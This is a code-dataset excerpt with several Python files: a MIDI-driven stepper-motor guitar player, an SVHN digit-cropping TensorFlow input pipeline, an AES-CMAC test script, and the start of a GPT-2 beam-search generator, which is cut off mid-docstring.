continue\n\n if done:\n print('move Stepper on string ',string,' aka ',OpenStrings[string][1],difference,' steps')\n for x in range(len(OpenStrings)):\n if len(strings[x])> 0:\n if strings[string][n][4] is OpenStrings[x][0]:\n if pluck[x] == False:\n pluck[x] = True\n elif pluck[x] == True:\n pluck[x] = False\n else:\n continue\n print('play ', OpenStrings[x][1],'pin',OpenStrings[x][2],'pick', pluck[x])\n strings[string][n-1][3] = 0;\n picks = guitar([2])\n wait = picks.Plucking(OpenStrings[x][2],pluck[x])\n\n if wait:\n # totalDelay = float(strings[x][n][5]) - subThis\n #\n # print(strings[x][n][5],'-',subThis)\n # print('before:', totalDelay)\n # totalDelay = 0 if totalDelay <= 0.0 else totalDelay\n # print('time delay: ', totalDelay)\n time.sleep(float(strings[x][n][5]))\n else:\n continue\n else:\n print('error at index ',n)\n break\n else:\n print('--------------------------------------------------------------------------')\n print('since this is the first note played on this string, move to its distance') #will def be changing considering we might start with open notes\n print(i,' note: ',strings[string][n][1] )\n difference = int(strings[string][n][1]) - int(OpenStrings[string][3])\n direction = 1 if difference > 0 else 2\n difference = abs(difference)\n difference = int(notePos[str(difference)])\n print('move Stepper on string ',string,' aka ',OpenStrings[string][1],'\\t',difference,' steps')\n\n subThis = 0\n if strings[string][n][4] == 0: #E4\n done = S0.step(difference,direction)\n elif strings[string][n][4] == 1: #B3\n done = S1.step(difference,direction)\n elif strings[string][n][4] == 2: #G3\n done = S2.step(difference,direction)\n elif strings[string][n][4] == 3: #D2\n done = S3.step(difference,direction)\n elif strings[string][n][4] == 4: #A2\n done = S4.step(difference,direction)\n elif strings[string][n][4] == 5: #E2\n done = S5.step(difference,direction)\n else:\n continue\n if done:\n for x in range(len(OpenStrings)):\n if len(strings[x])> 0:\n if strings[string][n][4] == OpenStrings[x][0]:\n if pluck[x] == False:\n pluck[x] = True\n elif pluck[x] == True:\n pluck[x] = False\n else:\n continue\n print('play ', OpenStrings[x][1],'pin',OpenStrings[x][2],'pick', pluck[x])\n strings[string][n-1][3] = 0;\n\n picks = guitar([2])\n wait = picks.Plucking(OpenStrings[x][2],pluck[x])\n\n if wait:\n # totalDelay = float(strings[x][n][5]) - subThis\n # totalDelay = 0.0 if totalDelay <= 0.0 else totalDelay\n # print('time delay: ', totalDelay)\n time.sleep(float(strings[x][n][5]))\n\n\n else:\n continue\n\n return strings\n\ndef reset(strings,notePos):\n OpenStrings = [[0,'E4',1,64],[1,'B3',2,59],[2,'G3',3,55],[3,'D2',4,50],[4,'A2',5,45],[5,'E2',6,40]]\n S0 = guitar([1,1,2,3,0])\n S1 = guitar([1,4,5,6,1])\n S2 = guitar([1,7,8,9,2])\n S3 = guitar([1,10,11,12,3])\n S4 = guitar([1,13,14,15,4])\n S5 = guitar([2,9,10,11,5])\n for string in range(len(strings)):\n if len(strings[string]) >0:\n # for n in range(len(strings[string])):\n n = len(strings[string])-1\n difference = int(OpenStrings[string][3])-int(strings[string][n][1])\n direction = 1 if difference > 0 else 2\n difference = abs(difference)\n difference = int(notePos[str(difference)])\n# index, note, string as string, finger flag, string as number, time delay of note\n if strings[string][n][4] == 0: #E4\n done = S0.step(difference,direction)\n elif strings[string][n][4] == 1: #B3\n done = S1.step(difference,direction)\n elif strings[string][n][4] == 2: #G3\n done = S2.step(difference,direction)\n elif strings[string][n][4] == 3: #D2\n done = S3.step(difference,direction)\n elif strings[string][n][4] == 4: #A2\n done = S4.step(difference,direction)\n elif strings[string][n][4] == 5: #E2\n done = S5.step(difference,direction)\n else:\n continue\n if done:\n print('moved Stepper on string ',string,' aka ',OpenStrings[string][1],difference,' steps')\n # print('moved stepper ',strings[string][n][4], )\n\ndef main():\n #Start here\n\n notePos={} #declare an empty dictionary\n strings = []\n notePos = Dictionary(notePos) #Fill said dictionary w/ nots and pos\n print('Dictionary for referrence \\n ', notePos)\n choice = menu() #start with a midi file or with a text file\n if int(choice == 1): #Midi\n fname = input('Give me a file name please\\n')\n Written = MIDItoTxt(fname) #Convert to text\n if Written:\n MidiNotes = ReadIt(fname) #parse thru text file\n elif int(choice == 2): #text\n fname = input('Give me a file name please\\n')\n MidiNotes = ReadIt(fname) #parse thru text file\n\n (MidiNotes,strings) = Open(MidiNotes, notePos ,strings) #For Strumming, convert to open notes and\n\n # print('Open string Midi Notes \\n', MidiNotes)\n print('strings\\n ', strings)\n pls = 0\n unchanged = []\n strings = Preview(MidiNotes,strings, notePos,pls)\n # print(strings)\n\n\n # for f in range(len(strings)):\n # if len(strings[f])>0:\n # # for n in range(len(strings[f])):\n # strings[f]=sorted(strings[f], key = lambda x : x[0])\n # print('\\nString:',f,strings[f])\n # print('These should now be sorted!:')\n\n strings = LetsPlay(MidiNotes,strings, notePos)\n print('strings\\n ', strings)\n reset(strings,notePos)\n\n # print('got back')\n # # if(Yay==1):\n # for i in range(len(MidiNotes)):\n # for string in range(len(strings)):\n # if len(strings[string])>0:\n # for wumbo in range(len(strings[string])):\n # if strings[string][wumbo][0]==i:\n # print(i,strings[string][wumbo][1],strings[string][wumbo][2],)\n # else:\n # continue\n #\n # print('done')\n\nif __name__ == '__main__':\n main()\n","sub_path":"ProjectLab2Git/PrettiesOnly/Shred.py","file_name":"Shred.py","file_ext":"py","file_size_in_byte":27177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"26846044","text":"from __future__ import print_function\nfrom PIL import Image\nfrom pathlib import Path, PureWindowsPath\nimport random\nimport tensorflow as tf\n\nfrom enumTypeSet import TypeSet\n\n\ndata_dir = '/tmp/svhn_data'\ntrain_dir = '/tmp/svhn_train'\ndata_dirDigitsTrain = '/tmp/svhn_dataDigits'\ndata_dirDigitsEval = '/tmp/svhn_dataDigitsEval'\n\nDATA_URL = 'http://ufldl.stanford.edu/housenumbers/train.tar.gz'\nIMAGE_SIZE = 32 #24\n\n# Global constants describing the CIFAR-10 data set.\nBATCH_SIZE = 64#64\nNUM_CLASSES = 10 #10 digits\n\n#NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 67813 #Numero esempi per epoca per fare il training (una e stata eliminata)\nNUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 61813\nNUM_EXAMPLES_PER_EPOCH_FOR_VALIDATION = 6000\nNUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 24514\n\ndef main():\n print(\"main readinput\")\n #readInfoAndCropDigits()\n #da cambiare e refactoring\n #readInfoAndCropDigitsEval()\n #read_input_train()\n\n\ndef elaborateFilesTrain():\n \"\"\"Construct distorted input for SVHN training using the Reader ops.\n\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n\n #crop digits if is necessary\n dir = Path(data_dirDigitsTrain)\n\n if (not dir.exists()):\n readInfoAndCropDigits()\n\n filenames = list(dir.glob('*.png'))\n # converte in a list of string paths\n filenames = list(map(lambda x: str(x.absolute()), filenames))\n\n f = open('validationSet.txt', \"r\")\n validationFiles = f.readlines()\n #file validation set empty..\n if(len(validationFiles) < NUM_EXAMPLES_PER_EPOCH_FOR_VALIDATION):\n validationFiles = []\n for i in range(0, NUM_EXAMPLES_PER_EPOCH_FOR_VALIDATION):\n validationFiles.append(filenames.pop(random.randrange(len(filenames)-1)))\n with open('validationSet.txt', 'w') as f:\n for nameFile in validationFiles:\n f.write(\"%s\\n\" % nameFile)\n else:\n validationFiles = list(map(lambda x: x.replace(\"\\n\", \"\"), validationFiles))\n filenamesCopy = filenames.copy()\n for namefile in validationFiles:\n filenames.remove(namefile)\n\n # Create a queue that produces the filenames to read\n # (he converts the strings in tensors) and add them to the fifoqueue\n return elaborateInput(TypeSet.TRAIN, filenames)\n\n\ndef elaborateFilesValidation():\n\n f = open('validationSet.txt', \"r\")\n validationFiles = f.readlines()\n validationFiles = list(map(lambda x: x.replace(\"\\n\",\"\"), validationFiles))\n return elaborateInput(TypeSet.VALIDATION, validationFiles)\n\ndef elaborateFilesTest():\n\n \"\"\"\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n #crop digits if is necessary\n dir = Path(data_dirDigitsEval)\n if (not dir.exists()):\n readInfoAndCropDigitsEval()\n\n filenames = list(dir.glob('*.png'))\n # converte in a list of string paths\n filenames = list(map(lambda x: str(x.absolute()), filenames))\n\n return elaborateInput(TypeSet.TEST, filenames)\n\n\ndef elaborateInput(typeSet, filenames):\n # Create a queue that produces the filenames to read\n # (he converts the strings in tensors) and add them to the fifoqueue\n filename_queue = tf.train.string_input_producer(filenames)\n with tf.name_scope('reading'):\n reader = tf.WholeFileReader(\"reader\")\n #restituisce una stringa che rappresenta il contenuto, e una stringa per il filename\n key,value = reader.read(filename_queue, \"read\")\n img_u = tf.image.decode_jpeg(value, channels=1)\n img_f = tf.cast(img_u, tf.float32)\n\n #data augmentation\n \"\"\"\n if typeSet is TypeSet.TRAIN:\n with tf.name_scope('data_augmentation'):\n img_f = tf.image.random_brightness(img_f, max_delta=63) #63\n img_f = tf.image.random_contrast(img_f, lower=0.2, upper=1.8)\n #\"\"\"\n # Subtract off the mean and divide by the variance of the pixels.\n float_image = tf.image.per_image_standardization(img_f)\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n # Set the shapes of tensors.\n\n splits = tf.string_split([key], \"\\\\\")\n pngName = splits.values[-1] #\"xxx_label.png\"\n\n #op_printlabel = tf.Print(pngName, [pngName], \"tensorLabel\")\n\n label = tf.string_split( [tf.string_split([pngName], \"\\\\.\").values[0]] ,'_').values[1]\n\n #with tf.control_dependencies([op_printlabel]):\n labelNumber = tf.strings.to_number(label, tf.int32)\n float_image = tf.image.resize_image_with_pad(float_image, height, width)\n\n # Ensure that the random shuffling has good mixing properties.\n min_fraction_of_examples_in_queue = 0.4\n\n if typeSet is TypeSet.TRAIN:\n numExample = NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN\n elif typeSet is TypeSet.VALIDATION:\n numExample = NUM_EXAMPLES_PER_EPOCH_FOR_VALIDATION\n elif typeSet is TypeSet.TEST:\n numExample = NUM_EXAMPLES_PER_EPOCH_FOR_EVAL\n\n min_queue_examples = int(numExample * min_fraction_of_examples_in_queue)\n print ('Filling queue with %d SVHN images before starting to train. '\n 'This will take a few minutes.' % min_queue_examples)\n\n return generate_image_and_label_batch(float_image, labelNumber,\n min_queue_examples, BATCH_SIZE ,\n shuffle=True)\n\n\n\n\ndef generate_image_and_label_batch(image, label, min_queue_examples,\n batch_size, shuffle):\n \"\"\"Construct a queued batch of images and labels.\n\n Args:\n image: 3-D Tensor of [height, width, 3] of type.float32. -> direi 1 D tensor (bianco e nero)\n label: 1-D Tensor of type.int32\n min_queue_examples: int32, minimum number of samples to retain\n in the queue that provides of batches of examples.\n batch_size: Number of images per batch.\n shuffle: boolean indicating whether to use a shuffling queue.\n\n Returns:\n images: Images. 4D tensor of [batch_size, height, width, 3] size. -> 3 d tensors [batch size, height, width, 1] (vedi con il debug però)\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n # Create a queue that shuffles the examples, and then\n # read 'batch_size' images + labels from the example queue.\n num_preprocess_threads = 16\n images, label_batch = tf.train.shuffle_batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size,\n min_after_dequeue=min_queue_examples)\n\n # Display the training images in the visualizer.\n tf.summary.image('images', images)\n\n return images, tf.reshape(label_batch, [batch_size])\n\n\ndef readInfoAndCropDigitsEval():\n pathDataDir = Path(data_dir, 'test')\n listFiles = list(pathDataDir.glob('*.png'))\n #size = (128, 128)\n\n digitsInfo = read_digitStruct(\"digitStruct_eval.txt\")\n # qui ci occupiamo di tagliare le cifre e fare il dataset\n\n dir = Path(data_dirDigitsEval)\n if(not dir.exists()):\n dir.mkdir()\n else:\n print(\"dir digits cropped already exits..\")\n return\n #print(\"cleaning files..\")\n #for file in list(dir.glob('*')):\n # file.unlink()\n\n iteration = 0\n numberOfImages = len(listFiles)\n apercentage = int(numberOfImages/100)\n print(\"cropping images:\")\n for file in listFiles:\n #file, ext = os.path.splitext(infile)\n fileNamePath = str(file.absolute())\n fileNameImg = fileNamePath.split(\"\\\\\")[-1]\n infoForDigitsImage = digitsInfo[fileNameImg]\n\n for singleInfoDigit in infoForDigitsImage:\n im = Image.open(fileNamePath)\n top = singleInfoDigit['top']\n left = singleInfoDigit['left']\n height = singleInfoDigit['height']\n width = singleInfoDigit['width']\n label = singleInfoDigit['label']\n #box – The crop rectangle, as a(left, upper, right, lower) - tuple.\n im = im.crop( (int(left),int(top), int(left)+int(width), int(top)+int(height)) )\n #im = im.resize(size) #thumbnail is better.. -> doesn't work!!!\n #im.thumbnail(size) (never mind, it will do later)..\n fileNameImgForSave = fileNameImg.split(\".\")[0]+\"_\" + label + \".png\"\n fileToSave = Path(data_dirDigitsEval, fileNameImgForSave)\n im.save(fileToSave, \"JPEG\")\n\n iteration +=1\n if(iteration % apercentage == 0):\n print(str(int((iteration/numberOfImages)*100)) + \"%\", end='...', flush=True)\n\n if(iteration>=numberOfImages):\n print(\"100% done\")\n\ndef readInfoAndCropDigits():\n data_dir = '/tmp/svhn_data'\n pathDataDir = Path(data_dir, 'train')\n listFiles = list(pathDataDir.glob('*.png'))\n size = (128, 128)\n\n\n digitsInfo = read_digitStruct(\"digitStruct_train.txt\")\n # qui ci occupiamo di tagliare le cifre e fare il dataset\n\n dir = Path(data_dirDigitsTrain)\n if(not dir.exists()):\n dir.mkdir()\n else:\n print(\"dir digits cropped already exits..\")\n return\n #print(\"cleaning files..\")\n #for file in list(dir.glob('*')):\n # file.unlink()\n\n iteration = 0\n numberOfImages = len(listFiles)\n apercentage = int(numberOfImages/100)\n print(\"cropping images:\")\n for file in listFiles:\n #file, ext = os.path.splitext(infile)\n fileNamePath = str(file.absolute())\n fileNameImg = fileNamePath.split(\"\\\\\")[-1]\n infoForDigitsImage = digitsInfo[fileNameImg]\n\n for singleInfoDigit in infoForDigitsImage:\n im = Image.open(fileNamePath)\n top = singleInfoDigit['top']\n left = singleInfoDigit['left']\n height = singleInfoDigit['height']\n width = singleInfoDigit['width']\n label = singleInfoDigit['label']\n #box – The crop rectangle, as a(left, upper, right, lower) - tuple.\n im = im.crop( (int(left),int(top), int(left)+int(width), int(top)+int(height)) )\n #im = im.resize(size) #thumbnail is better.. -> doesn't work!!!\n #im.thumbnail(size) (never mind, it will do later)..\n fileNameImgForSave = fileNameImg.split(\".\")[0]+\"_\" + label + \".png\"\n fileToSave = Path(data_dirDigitsTrain, fileNameImgForSave)\n im.save(fileToSave, \"JPEG\")\n\n iteration +=1\n if(iteration % apercentage == 0):\n print(str(int((iteration/numberOfImages)*100)) + \"%\", end='...', flush=True)\n\n if(iteration>=numberOfImages):\n print(\"100% done\")\n\n\ndef read_digitStruct(nomefile):\n with open(nomefile, \"r\") as f:\n digitDict = {}\n\n for line in f:\n tokens = line.split(';')\n digitsInfo = {}\n for token in tokens:\n if ':' in token:\n key = token.split(':')[0].strip(' ')\n value = token.split(':')[1].strip(' ')\n if key == \"name\":\n if value in digitDict:\n digitDict[value].append(digitsInfo)\n #listDigits.append(digitsInfo)\n #digitDict[value] = listdigits\n else:\n digitDict[value] = [digitsInfo] #'1.png': {'top':..., 'left':..., 'height':...,...}\n else:\n digitsInfo[key] = value\n\n return digitDict\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tutorials/image/cifar10/svhn_readInput.py","file_name":"svhn_readInput.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"550753174","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Author: zealotnt\n# @Date: 2017-05-11 14:43:27\n\nimport os\nimport sys\nimport git\nimport os\nimport inspect\ndef get_git_root():\n\tCURRENT_DIR = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + os.sep\n\tpath = CURRENT_DIR\n\tgit_repo = git.Repo(path, search_parent_directories=True)\n\tgit_root = git_repo.git.rev_parse(\"--show-toplevel\")\n\treturn git_root\nsys.path.insert(0, get_git_root() + '/test_bluefinserial/bluefinserial')\nfrom utils import *\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import cmac\nfrom cryptography.hazmat.primitives.ciphers import algorithms\n\ndef main():\n\tmessage = b\"message to authenticate\"\n\taes_key = os.urandom(32)\n\n\tc = cmac.CMAC(algorithms.AES(aes_key), backend=default_backend())\n\tc.update(message)\n\tcmacRes = c.finalize()\n\n\t# Dump hex value\n\tdump_hex(\n\t\tmessage,\n\t\t'message: ',\n\t\tpreFormat=\"C\"\n\t)\n\tdump_hex(\n\t\taes_key,\n\t\t'aes_key: ',\n\t\tpreFormat=\"C\"\n\t)\n\tdump_hex(\n\t\tcmacRes,\n\t\t'cmac: ',\n\t\tpreFormat=\"C\"\n\t)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"test_crypto/fat_test/cmac.py","file_name":"cmac.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"393929910","text":"#!/usr/bin/env python3\n\n#import fire\nimport json\nimport numpy as np\n\nimport encoder\n\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\n\nimport numpy\nimport io\nimport sys\nimport threading\nimport math\nimport random\n\nimport json\nimport collections\nfrom collections import Counter\nfrom collections import OrderedDict\nfrom progress.bar import Bar as Bar\n\nfrom util import AverageMeter, SpanLogit, GetBestSpan, accuracy\nimport tokenization\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--lib', default='/home/yelongshen/biglearn/biglearn/Targets', type=str, help='storm lib path')\nparser.add_argument('--gpu_id', type=str, default='0', help='gpu ids to use.')\n\n#parser.add_argument('--vocab', type=str, default='/data1/yelongshen/bert_model/uncased_L-12_H-768_A-12/vocab.txt', help='vocab file')\n\n\nargs = parser.parse_args()\n\ndevice_num = len(args.gpu_id.split(','))\nprint(\"set gpu number \", device_num)\nos.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu_id)\n\n\nimport clr as net_clr\nfrom System import Array, IntPtr, Int32, Int64, Collections\n\nsys.path.append(args.lib) \nnet_clr.AddReference('BigLearn')\nnet_clr.AddReference('BigLearn.DeepNet')\n\nimport BigLearn\nfrom BigLearn import StructureLearner, DeviceType, DNNRunMode, RunnerBehavior, DeviceBehavior, RunHelper, A_Func, IntArgument, FloatArgument, RateScheduler, ResourceManager, Session, ComputationGraph\nfrom BigLearn import BaseBertModel, EmbedStructure, LSTMStructure, LayerStructure, CompositeNNStructure, LSTMCell, Structure, TransformerStructure, GPTModel\nfrom BigLearn import CudaPieceInt, CudaPieceFloat, NdArrayData, SeqDenseBatchData\nfrom BigLearn import GradientOptimizer, ParameterSetting, NCCL\nfrom BigLearn import CrossEntropyRunner\n\n\nclass gpt_model:\n def __init__(self, model_name, models_dir, behavior):\n \n self.Behavior = behavior\n self.Session = Session(behavior) \n self.Models = {}\n self.Models['layer'] = 12\n self.Models['vocab'] = 50257\n self.Models['embed'] = 768\n self.Models['gpt_model'] = self.Session.Model.AddLayer(GPTModel(self.Models['layer'], -1, self.Models['embed'], 1024, self.Models['vocab'], self.Behavior.Device))\n\n self.Models['gpt_model'].LoadGptModel(os.path.join(models_dir, model_name, \"modelexp.label\"), os.path.join(models_dir, model_name, \"modelexp.bin\"))\n\n\ndef init_attmask(att_mask, max_seq_length):\n for i in range(max_seq_length):\n for j in range(max_seq_length):\n if i >= j:\n att_mask[i * max_seq_length + j] = 1\n else:\n att_mask[i * max_seq_length + j] = 0\n att_mask.SyncFromCPU()\n\n\n\nclass gpt_gen:\n def __init__(self, enc, models, max_cond_length, max_ans_length, batch_size, behavior):\n\n #def __init__(self, models, max_cond_length, max_ans_length, batch_size, head_att, beam_size, vocab_size, behavior):\n self.Behavior = behavior\n\n self.Session = Session(behavior)\n self.Models = models\n\n beam_size = 3\n self.beam_size = beam_size\n\n max_seq_length = max_cond_length + max_ans_length\n self.max_seq_length = max_seq_length\n self.max_cond_length = max_cond_length\n self.max_ans_length = max_ans_length\n\n self.batch_size = batch_size\n\n head_att = 12\n\n _batch = IntArgument('batch', batch_size)\n \n _dim = IntArgument('dim', self.Models['embed'])\n _head = IntArgument('head', head_att)\n _slice = IntArgument('slice', self.Models['embed'] / head_att)\n _default = IntArgument('default', 1)\n \n _q_seq = IntArgument('q_seq', max_cond_length)\n _a_seq = IntArgument('a_seq', max_ans_length)\n _vocab = IntArgument('vocab', self.Models['vocab'])\n\n self.q_tokens = CudaPieceInt(batch_size * max_cond_length, self.Behavior.Device)\n \n self.att_mask = CudaPieceInt(max_cond_length * max_cond_length, self.Behavior.Device)\n init_attmask(self.att_mask, max_cond_length)\n\n scaleVec = CudaPieceFloat(2, self.Behavior.Device)\n scaleVec[0] = 0\n scaleVec[1] = 1.0 / math.sqrt(models['embed'] / head_att)\n scaleVec.SyncFromCPU()\n\n biasVec = CudaPieceFloat(2, self.Behavior.Device)\n biasVec[0] = -1e9\n biasVec[1] = 0\n biasVec.SyncFromCPU()\n\n mask_scale = self.Session.LookupEmbed(NdArrayData(self.Behavior.Device, scaleVec, None, _default, IntArgument('mask_vocab', 2)), self.att_mask) \n mask_bias = self.Session.LookupEmbed(NdArrayData(self.Behavior.Device, biasVec, None, _default, IntArgument('mask_vocab', 2)), self.att_mask)\n\n q_token_embed = self.Session.LookupEmbed(self.Models['gpt_model'].TokenEmbed, self.q_tokens).Reshape(_dim, _q_seq, _batch)\n _pos_embed = self.Session.LookupEmbed(self.Models['gpt_model'].PosEmbed, [i for i in range(max_cond_length)]).Reshape(_dim, _q_seq, _default)\n norm_emd = self.Session.Add(q_token_embed, _pos_embed) \n \n _beam = IntArgument('beam_size', self.beam_size)\n\n _seq = IntArgument('seq', max_seq_length)\n \n _seq_batch = IntArgument('seq_batch', batch_size * max_seq_length)\n _seq_beam = IntArgument('seq_beam', self.beam_size * self.max_seq_length)\n _batch_beam = IntArgument('batch_beam', self.batch_size * self.beam_size) \n _vocab_beam = IntArgument('vocab', self.Models['vocab'] * self.beam_size)\n\n _mem_dim = IntArgument('mem_dim', self.Models['embed'] * self.max_seq_length)\n\n mem_key_buffer = []\n mem_value_buffer = []\n \n double_key_buff = []\n double_value_buff = []\n \n for layer in range(self.Models['layer']):\n r = self.Session.GPTTransformerKV(self.Models['gpt_model'].Blocks[layer], norm_emd, head_att, mask_scale.Output, mask_bias.Output, 0.0)\n norm_emd = r.Item1\n\n mem_key = r.Item2.Reshape(_slice, _q_seq, _head, _default, _batch) \n mem_value = r.Item3.Reshape(_slice, _q_seq, _head, _default, _batch) \n\n full_mem_key = self.Session.Extend(mem_key, _slice, _seq, _head, _beam, _batch).Reshape(_slice, _seq, _head, _batch_beam)\n full_mem_value = self.Session.Extend(mem_value, _slice, _seq, _head, _beam, _batch).Reshape(_slice, _seq, _head, _batch_beam)\n\n mem_key_buffer.append(full_mem_key) \n mem_value_buffer.append(full_mem_value)\n\n double_key_buff.append(NdArrayData(full_mem_key.Dimensions, behavior.Device))\n double_value_buff.append(NdArrayData(full_mem_value.Dimensions, behavior.Device))\n\n self.pred_pos = CudaPieceInt(self.batch_size, self.Behavior.Device)\n self.beam_pred_pos = CudaPieceInt(self.batch_size * self.beam_size, self.Behavior.Device)\n\n _p_embed = self.Session.Extract3DTensor(norm_emd, self.pred_pos)\n\n cur_position = self.beam_pred_pos\n\n cur_buffer_key = mem_key_buffer\n cur_buffer_value = mem_value_buffer\n\n cache_buffer_key = double_key_buff\n cache_buffer_value = double_value_buff\n\n self.beam_scores = []\n self.beam_tokens = []\n self.beam_idxes = []\n\n _beam_offset = CudaPieceInt(self.beam_size * self.batch_size, self.Behavior.Device)\n for i in range(self.beam_size * self.batch_size):\n _beam_offset[i] = int(i / self.beam_size) * self.beam_size \n _beam_offset.SyncFromCPU() \n\n # get the last token.. \n # bit of a problem with the way the game is played. I'm not sure if I'm going to play it or not. I'm not sure if I'm going to play it or not. I'm not sure if I'm going to play it or not.\n#I'm not sure if I'm going\n\n for i in range(self.max_ans_length):\n \n ## shape (dim, batch) or (dim, _batch_beam)\n _p_embed = self.Session.Norm(_p_embed, 0)\n\n _p_embed = self.Session.DotAndAdd(_p_embed, self.Models['gpt_model'].NdOutputNormScale, self.Models['gpt_model'].NdOutputNormBias)\n\n _logit = self.Session.MatMul(_p_embed, 0, self.Models['gpt_model'].NdTokenEmbed, 1)\n _prob = self.Session.Softmax(_logit)\n _logp = self.Session.Act(_prob, A_Func.Log)\n\n # for beam search:\n if i > 0:\n _logp = self.Session.Reshape(_logp, _vocab, _beam, _batch)\n _logp = self.Session.Add(_logp, self.beam_scores[i - 1]).Reshape(_vocab_beam, _batch) \n\n _topK_w = self.Session.ArgmaxKV3(_logp, beam_size)\n self.beam_scores.append(_topK_w.Item1.Reshape(_default, _beam, _batch))\n\n _chosen_beam = self.Session.DivMod(_topK_w.Item3, self.Models['vocab'])\n \n _beam_idx = _chosen_beam.Item1 \n _tokens = _chosen_beam.Item2\n\n self.beam_tokens.append(_tokens)\n self.beam_idxes.append(_beam_idx)\n\n if i == self.max_ans_length - 1:\n break\n\n # for beam search:\n\n _beam_batch_idx = self.Session.Add(_beam_idx, _beam_offset, self.batch_size * self.beam_size) # CudaPieceInt a, CudaPieceInt b, int size)\n\n for layer in range(self.Models['layer']):\n self.Session.LookupEmbed(cur_buffer_key[layer].Reshape(_mem_dim, _batch_beam), _beam_batch_idx, cache_buffer_key[layer].Reshape(_mem_dim, _batch_beam))\n self.Session.LookupEmbed(cur_buffer_value[layer].Reshape(_mem_dim, _batch_beam), _beam_batch_idx, cache_buffer_value[layer].Reshape(_mem_dim, _batch_beam))\n\n tmp_buf = cur_buffer_value\n cur_buffer_value = cache_buffer_value\n cache_buffer_value = tmp_buf\n\n tmp_buf = cur_buffer_key\n cur_buffer_key = cache_buffer_key\n cache_buffer_key = tmp_buf\n\n\n cur_position = self.Session.Inc(cur_position, 1)\n\n _token_embed = self.Session.LookupEmbed(self.Models['gpt_model'].TokenEmbed, _tokens).Reshape(_dim, _beam, _batch) \n _pos_embed = self.Session.LookupEmbed(self.Models['gpt_model'].PosEmbed, cur_position).Reshape(_dim, _beam, _batch)\n _embed = self.Session.Add(_token_embed, _pos_embed).Reshape(_dim, _batch_beam)\n \n for layer in range(self.Models['layer']):\n #print('cur layer', layer, len(cur_buffer_key), len(cur_buffer_value), len(self.Models['gpt_model'].Blocks))\n _embed = self.Session.SingalGPTTransformer(self.Models['gpt_model'].Blocks[layer], head_att, cur_buffer_key[layer], cur_buffer_value[layer], self.max_seq_length, _embed, cur_position, 0.0)\n _p_embed = _embed\n\n def predict(self, q_tokens, q_len): \n self.Behavior.Setup()\n self.Behavior.SetPredictMode()\n\n for b in range(self.batch_size):\n for q in range(0, q_len[b]):\n self.q_tokens[b * self.max_cond_length + q] = q_tokens[b][q]\n\n for pad in range(0, self.max_cond_length - q_len[b]):\n self.q_tokens[b * self.max_cond_length + q_len[b] + pad] = 50256\n\n self.pred_pos[b] = q_len[b] - 1\n\n for x in range(self.beam_size):\n self.beam_pred_pos[b * self.beam_size + x] = self.pred_pos[b]\n #self.q_last_pos[b] = q_len[b] - 1\n\n self.q_tokens.SyncFromCPU()\n self.pred_pos.SyncFromCPU()\n self.beam_pred_pos.SyncFromCPU()\n\n self.Session.ForwardV3() \n\n self.ans_tok_ids = torch.zeros([self.batch_size, self.max_ans_length], dtype = torch.int32)\n self.ans_tok_len = torch.zeros([self.batch_size], dtype = torch.int32)\n\n\n max_beam = [-100000.0] * self.batch_size\n max_beam_idx = [-1] * self.batch_size\n\n for i in range(self.max_ans_length):\n self.beam_tokens[i].SyncToCPU()\n self.beam_scores[i].Output.SyncToCPU()\n self.beam_idxes[i].SyncToCPU()\n\n #self.beam_idxes[i].Print('beam indexes:', self.batch_size * self.beam_size, False)\n\n for p_i in range(self.max_ans_length, 0, -1):\n i = p_i - 1\n for b in range(self.batch_size):\n new_beam = False\n for s in range(self.beam_size):\n idx = b * self.beam_size + s\n bs = self.beam_scores[i].Output[idx]\n\n if((self.beam_tokens[i][idx] == 50256 or p_i == self.max_ans_length) and bs > max_beam[b]):\n max_beam[b] = bs\n max_beam_idx[b] = idx\n \n self.ans_tok_ids[b][i] = self.beam_tokens[i][idx]\n self.ans_tok_len[b] = p_i\n\n new_beam = True\n #print('beam tokens length', len(self.beam_tokens), b, p_i)\n if not new_beam:\n #print('max beam_idx 1', max_beam_idx[b])\n\n max_beam_idx[b] = self.beam_idxes[i + 1][max_beam_idx[b]]\n #print('max beam_idx 2', max_beam_idx[b])\n\n self.ans_tok_ids[b][i] = self.beam_tokens[i][max_beam_idx[b]] \n #print('max token', self.tok_ids[i])\n\n\n return self.ans_tok_ids, self.ans_tok_len\n\n #for b in range(self.batch_size):\n # if(self.tok_len[b] == 0):\n # self.tok_len[b] = self.max_seq_length\n #def backward(self):\n # self.Session.BackwardV3()\n\n\ndef interact_model(\n model_name='117M',\n seed=None,\n nsamples=1,\n batch_size=1,\n length=None,\n temperature=1,\n top_k=0,\n models_dir='/data1/yelongshen/gpt-2/models', \n):\n \"\"\"\n Interactively run the model\n :model_name=117M : String, which model to use\n :seed=None : Integer seed for random number generators, fix seed to reproduce\n results\n :nsamples=1 : Number of samples to return total\n :batch_size=1 : Number of batches (only affects speed/memory). Must divide nsamples.\n :length=None : Number 